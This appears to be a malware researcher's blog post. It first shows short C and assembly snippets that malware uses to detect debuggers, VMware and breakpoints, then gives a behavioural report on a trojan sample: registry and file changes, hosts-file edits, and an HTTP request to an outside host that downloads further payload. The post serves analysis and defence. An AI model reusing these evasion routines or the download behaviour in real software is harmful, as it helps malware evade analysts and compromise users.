W01f Labs

As a malware researcher (during leisure), we face a constant challenge from the malware writers trying to outsmart us by using many anti analysis technique in their malware. Deter and confuse researchers from analysing the malware.

These techniques include:

Obfuscation/hiding of codes & scripts

Base64

unescape(dz+cz+op+st)+'dw(dz+cz($+st));')}else{$=''};function sc(cnm,v,ed)

Encryption of Source code & data

Junk code (useless instructions and rountine)

Detection of analysis tools (virtual system, monitoring tools, debugger)

Conduct integrity checks (Prevent tampering and patching)

Below are some sample code used by malware to detect analysis tools.

Detect OllyDbg
The function IsODBGLoaded will return true if debugger is detected

__inline bool IsODBGLoaded() {
char *caption="DAEMON";
_asm {

push 0x00
push caption

mov eax, fs:[30h]
movzx eax, byte ptr[eax+0x2]
or al,al
jz normal_
jmp out_
normal_:

xor eax, eax
leave
ret
out_:

mov eax, 0x1
leave
ret
}
}

Detect VMWare
It checks the version and see if it is running inside the virtual

/* Check VMware version only */

int VMGetVersion() {

unsigned long version, magic, command;
command=VMCMD_GET_VERSION;
VMBackDoor(&version, &magic, &command, NULL);
if(magic==VMWARE_MAGIC) return version;
else return 0;
}

/* Check if running inside VMWare */

int IsVMWare() {

int version=VMGetVersion();
if(version) return true; else return false;
}

Detecting Breakpoints
The function IsBPX checks if the given memory address is a breakpoint.

__inline bool IsBPX(void *address) {

_asm {

mov esi, address
mov al, [esi]
cmp al, 0xCC
je BPXed

xor eax, eax
jmp NOBPX
BPXed:

mov eax, 1
NOBPX:
}
}

I have receive a suspicious file from my colleague yesterday and done a simple behaviour analysis on it. It seems to be a relatively new virus as major AV tools (such as McAfee, TrendMicro, Kaspersky, F-secure..) were not able to detect it.

Analysis Report:
##############

File: 1.exe
Size: 1033728
MD5: 19AB525B9AF6CBB40F428115E8148522
Virus Found: Trojan.Dropper (Symantec), Win32/Heur (AVG), TR/Crypt.FKM.Gen (AntiVir), Mal/EncPk-EE (Sophos)

On the VirusTotal website, only 20 out of 40 AV detected it (details).

Summary:
=======
The Trojan will modify the PCIDump service, add several .sys files such as acpiec.sys into your C:\Windows\system32 folder. It will also copy itself and add a autorun.inf to C:\. It will also copy phpi.dll into C:\Windows folder.

It changes the Hosts file and try to connect to www.cvbasefwdase.cn via HTTP to download other files. Likely to be trying to download more malicious payload.

Techincal Details:
################

Registry keys added:
==============
HKLM\SOFTWARE\Microsoft\ESENT\Process\ipconfig
HKLM\SOFTWARE\Microsoft\ESENT\Process\ipconfig\DEBUG
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\Control
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\Control
HKLM\SYSTEM\ControlSet001\Services\pcidump
HKLM\SYSTEM\ControlSet001\Services\pcidump\Security
HKLM\SYSTEM\ControlSet001\Services\pcidump\Enum
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Security
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Enum
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\Control
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\Control
HKLM\SYSTEM\CurrentControlSet\Services\pcidump
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Security
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Enum
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Security
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Enum
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell

Registry keys deleted:
==============
HKLM\SYSTEM\ControlSet001\Services\PCIDump
HKLM\SYSTEM\CurrentControlSet\Services\PCIDump

Registry values added:
===============
HKLM\SOFTWARE\Microsoft\ESENT\Process\ipconfig\DEBUG\Trace Level: ""
HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperations: 5C 3F 3F 5C 63 3A 5C 77 69 6E 64 6F 77 73 5C 73 79 73 74 65 6D 33 32 5C 64 72 69 76 65 72 73 5C 4F 4C 44 35 2E 74 6D 70 00 00 00
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\Control\ActiveService: "pcidump"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\Service: "pcidump"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\Legacy: 0x00000001
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\Class: "LegacyDriver"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\DeviceDesc: "pcidump"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\Control\ActiveService: "UPDATEDATA"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\Service: "UPDATEDATA"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\Legacy: 0x00000001
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\Class: "LegacyDriver"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\DeviceDesc: "UPDATEDATA"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\0: "SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}"
HKLM\SYSTEM\ControlSet001\Services\pcidump\Enum\0: "Root\LEGACY_PCIDUMP\0000"
HKLM\SYSTEM\ControlSet001\Services\pcidump\Enum\Count: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\pcidump\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\pcidump\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKLM\SYSTEM\ControlSet001\Services\pcidump\Type: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\pcidump\Start: 0x00000003
HKLM\SYSTEM\ControlSet001\Services\pcidump\ErrorControl: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\pcidump\ImagePath: "System32\DRIVERS\pcidump.sys"
HKLM\SYSTEM\ControlSet001\Services\pcidump\DisplayName: "pcidump"
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Enum\0: "Root\LEGACY_UPDATEDATA\0000"
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Enum\Count: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Type: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Start: 0x00000003
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\ErrorControl: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\ImagePath: "\??\C:\WINDOWS\system32\drivers\acpiec.sys"
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\DisplayName: "UPDATEDATA"
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations: 5C 3F 3F 5C 63 3A 5C 77 69 6E 64 6F 77 73 5C 73 79 73 74 65 6D 33 32 5C 64 72 69 76 65 72 73 5C 4F 4C 44 35 2E 74 6D 70 00 00 00
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\Control\ActiveService: "pcidump"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\Service: "pcidump"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\Legacy: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\Class: "LegacyDriver"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\DeviceDesc: "pcidump"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\Control\ActiveService: "UPDATEDATA"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\Service: "UPDATEDATA"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\Legacy: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\Class: "LegacyDriver"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\DeviceDesc: "UPDATEDATA"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\0: "SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}"
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Enum\0: "Root\LEGACY_PCIDUMP\0000"
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Enum\Count: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Type: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Start: 0x00000003
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\ErrorControl: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\ImagePath: "System32\DRIVERS\pcidump.sys"
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\DisplayName: "pcidump"
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Enum\0: "Root\LEGACY_UPDATEDATA\0000"
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Enum\Count: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Type: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Start: 0x00000003
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\ErrorControl: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\ImagePath: "\??\C:\WINDOWS\system32\drivers\acpiec.sys"
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\DisplayName: "UPDATEDATA"
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\1.rkr: 09 00 00 00 06 00 00 00 F0 8C 78 3B 88 E9 C9 01
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\FolderType: "MyDocuments"
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\@shell32.dll,-12691: "My Recent Documents"
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Owner\Desktop\1.exe: "Microsoft ???????"

Registry values deleted:
================
HKLM\SYSTEM\ControlSet001\Services\PCIDump\ErrorControl: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\PCIDump\Group: "PCI Configuration"
HKLM\SYSTEM\ControlSet001\Services\PCIDump\Start: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\PCIDump\Tag: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\PCIDump\Type: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\PCIDump\ErrorControl: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\PCIDump\Group: "PCI Configuration"
HKLM\SYSTEM\CurrentControlSet\Services\PCIDump\Start: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\PCIDump\Tag: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\PCIDump\Type: 0x00000001

Registry values modified:
=================
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: C9 5A 15 C4 25 28 78 C3 EA 94 2F FD E9 49 6F 86 00 EA EC 29 33 E7 A4 37 AE D9 53 A6 3F 7C 0F 9B 7C B4 0C C8 B7 B8 C6 6C 07 CD 75 47 55 88 CC E0 E4 31 36 49 C8 36 EC C6 A7 CD 6C 87 BB 2A 41 42 B9 55 42 B9 53 0C FE 7F 17 BA 4B E4 32 E0 33 4D
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 72 0B C5 74 CD 96 F6 DF 3D 2D 96 32 0A 0B CE ED 24 AA AA E6 4B 52 CE B7 C5 99 30 82 1D 4B 31 65 A0 C0 4F 8B B2 E5 FE 0B BE EF A8 61 B8 FD 4B 5C C6 59 F8 9B 2E E8 7C B8 AF 3C EE 3E 34 74 23 78 5D DC 0E E7 05 99 3D D5 4B A3 48 5B 66 6C 8E 38
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000006
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000014
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesSuccessful: 0x00000002
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesSuccessful: 0x0000000A
HKLM\SYSTEM\ControlSet001\Services\Eventlog\Application\ESENT\EventMessageFile: "c:\windows\system32\ESENT.dll"
HKLM\SYSTEM\ControlSet001\Services\Eventlog\Application\ESENT\EventMessageFile: "C:\WINDOWS\system32\ESENT.dll"
HKLM\SYSTEM\ControlSet001\Services\Eventlog\Application\ESENT\CategoryMessageFile: "c:\windows\system32\ESENT.dll"
HKLM\SYSTEM\ControlSet001\Services\Eventlog\Application\ESENT\CategoryMessageFile: "C:\WINDOWS\system32\ESENT.dll"
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\Count: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\Count: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\NextInstance: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\ESENT\EventMessageFile: "c:\windows\system32\ESENT.dll"
HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\ESENT\EventMessageFile: "C:\WINDOWS\system32\ESENT.dll"
HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\ESENT\CategoryMessageFile: "c:\windows\system32\ESENT.dll"
HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\ESENT\CategoryMessageFile: "C:\WINDOWS\system32\ESENT.dll"
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance: 0x00000001
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 09 00 00 00 61 00 00 00 A0 22 D9 17 88 E9 C9 01
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 09 00 00 00 62 00 00 00 20 EB 67 3B 88 E9 C9 01
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 09 00 00 00 9E 00 00 00 40 D7 FC 17 88 E9 C9 01
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 09 00 00 00 9F 00 00 00 F0 8C 78 3B 88 E9 C9 01
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 46 00 00 00 31 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 B0 A8 11 EE B6 52 C9 01 01 00 00 00 C0 A8 EC 80 00 00 00 00 00 00 00 00 00 00 00 00
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 46 00 00 00 32 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 B0 A8 11 EE B6 52 C9 01 01 00 00 00 C0 A8 EC 80 00 00 00 00 00 00 00 00 00 00 00 00
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 00 00 00 00 01 00 00 00 03 00 00 00 07 00 00 00 05 00 00 00 06 00 00 00 04 00 00 00 02 00 00 00 FF FF FF FF
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 05 00 00 00 00 00 00 00 01 00 00 00 03 00 00 00 07 00 00 00 06 00 00 00 04 00 00 00 02 00 00 00 FF FF FF FF
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\Windowplacement: 2C 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF CE 00 00 00 24 00 00 00 26 03 00 00 18 02 00 00
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\Windowplacement: 2C 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF E6 00 00 00 37 00 00 00 3E 03 00 00 2B 02 00 00
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\SymbolWarningShown: 0x00000000
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\SymbolWarningShown: 0x00000001
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\DefaultProcPropPage: 0x00000000
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\DefaultProcPropPage: 0x00000006

Files added:
========
C:\WINDOWS\system32\CatRoot2\tmp.edb
C:\WINDOWS\system32\dllcache\acpiec.sys
C:\WINDOWS\system32\drivers\OLD5.tmp
C:\WINDOWS\system32\drivers\pcidump.sys
C:\WINDOWS\system32\func.dll
C:\WINDOWS\LastGood\system32\drivers\acpiec.sys
C:\WINDOWS\phpi.dll
C:\1.exe
C:\autorun.inf

Files modified:
==========
C:\Documents and Settings\Owner\Cookies\index.dat
C:\Documents and Settings\Owner\Local Settings\History\History.IE5\index.dat
C:\Documents and Settings\Owner\Local Settings\Temporary Internet Files\Content.IE5\index.dat
C:\Documents and Settings\Owner\ntuser.dat.LOG
C:\WINDOWS\Prefetch\CMD.EXE-087B4001.pf
C:\WINDOWS\setupapi.log
C:\WINDOWS\system32\CatRoot2\edb.chk
C:\WINDOWS\system32\CatRoot2\edb.log
C:\WINDOWS\system32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb
C:\WINDOWS\system32\config\default.LOG
C:\WINDOWS\system32\config\software.LOG
C:\WINDOWS\system32\config\system.LOG
C:\WINDOWS\system32\drivers\acpiec.sys
C:\WINDOWS\system32\drivers\etc\hosts

Folder added:
=========
C:\WINDOWS\LastGood
C:\WINDOWS\LastGood\system32
C:\WINDOWS\LastGood\system32\drivers

Other behaviours:
============
>System connecting to www.cvbasefwdase.cn:80
The following HTTP request found:
Get /new.txt HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.cvbasefwdase.cn
Connection: Keep-Alive

>System listening on UDP as va9sdhun23.cn:1030

>Running "rundll32.exe" as a process

>Change the hosts file with the following entries:
127.0.0.1 v.onondown.com.cn
127.0.0.2 ymsdasdw1.cn
127.0.0.3 h96b.info
127.0.0.0 fuck.zttwp.cn
127.0.0.0 www.hackerbf.cn
127.0.0.0 geekbyfeng.cn
127.0.0.0 121.14.101.68
127.0.0.0 ppp.etimes888.com
127.0.0.0 www.bypk.com
127.0.0.0 CSC3-2004-crl.verisign.com
127.0.0.1 va9sdhun23.cn
127.0.0.0 udp.hjob123.com
127.0.0.2 bnasnd83nd.cn
127.0.0.0 www.gamehacker.com.cn
127.0.0.0 gamehacker.com.cn
127.0.0.3 adlaji.cn
127.0.0.1 858656.com
127.1.1.1 bnasnd83nd.cn
127.0.0.1 my123.com
127.0.0.0 user1.12-27.net
127.0.0.1 8749.com
127.0.0.0 fengent.cn
127.0.0.1 4199.com
127.0.0.1 user1.16-22.net
127.0.0.1 7379.com
127.0.0.1 2be37c5f.3f6e2cc5f0b.com
127.0.0.1 7255.com
127.0.0.1 user1.23-12.net
127.0.0.1 3448.com
127.0.0.1 www.guccia.net
127.0.0.1 7939.com
127.0.0.1 a.o1o1o1.nEt
127.0.0.1 8009.com
127.0.0.1 user1.12-73.cn
127.0.0.1 piaoxue.com
127.0.0.1 3n8nlasd.cn
127.0.0.1 kzdh.com
127.0.0.0 www.sony888.cn
127.0.0.1 about.blank.la
127.0.0.0 user1.asp-33.cn
127.0.0.1 6781.com
127.0.0.0 www.netkwek.cn
127.0.0.1 7322.com
127.0.0.0 ymsdkad6.cn
127.0.0.1 localhost
127.0.0.0 www.lkwueir.cn
127.0.0.1 06.jacai.com
127.0.1.1 user1.23-17.net
127.0.0.1 1.jopenkk.com
127.0.0.0 upa.luzhiai.net
127.0.0.1 1.jopenqc.com
127.0.0.0 www.guccia.net
127.0.0.1 1.joppnqq.com
127.0.0.0 4m9mnlmi.cn
127.0.0.1 1.xqhgm.com
127.0.0.0 mm119mkssd.cn
127.0.0.1 100.332233.com
127.0.0.0 61.128.171.115:8080
127.0.0.1 121.11.90.79
127.0.0.0 www.1119111.com
127.0.0.1 121565.net
127.0.0.0 win.nihao69.cn
127.0.0.1 125.90.88.38
127.0.0.1 16888.6to23.com
127.0.0.1 2.joppnqq.com
127.0.0.0 puc.lianxiac.net
127.0.0.1 204.177.92.68
127.0.0.0 pud.lianxiac.net
127.0.0.1 210.74.145.236
127.0.0.0 210.76.0.133
127.0.0.1 219.129.239.220
127.0.0.0 61.166.32.2
127.0.0.1 219.153.40.221
127.0.0.0 218.92.186.27
127.0.0.1 219.153.46.27
127.0.0.0 www.fsfsfag.cn
127.0.0.1 219.153.52.123
127.0.0.0 ovo.ovovov.cn
127.0.0.1 221.195.42.71
127.0.0.0 dw.com.com
127.0.0.1 222.73.218.115
127.0.0.1 203.110.168.233:80
127.0.0.1 3.joppnqq.com
127.0.0.1 203.110.168.221:80
127.0.0.1 363xx.com
127.0.0.1 www1.ip10086.com.cm
127.0.0.1 4199.com
127.0.0.1 blog.ip10086.com.cn
127.0.0.1 43242.com
127.0.0.1 www.ccji68.cn
127.0.0.1 5.xqhgm.com
127.0.0.0 t.myblank.cn
127.0.0.1 520.mm5208.com
127.0.0.0 x.myblank.cn
127.0.0.1 59.34.131.54
127.0.0.1 210.51.45.5
127.0.0.1 59.34.198.228
127.0.0.1 www.ew1q.cn
127.0.0.1 59.34.198.88
127.0.0.1 59.34.198.97
127.0.0.1 60.190.114.101
127.0.0.1 60.190.218.34
127.0.0.0 qq-xing.com.cn
127.0.0.1 60.191.124.252
127.0.0.1 61.145.117.212
127.0.0.1 61.157.109.222
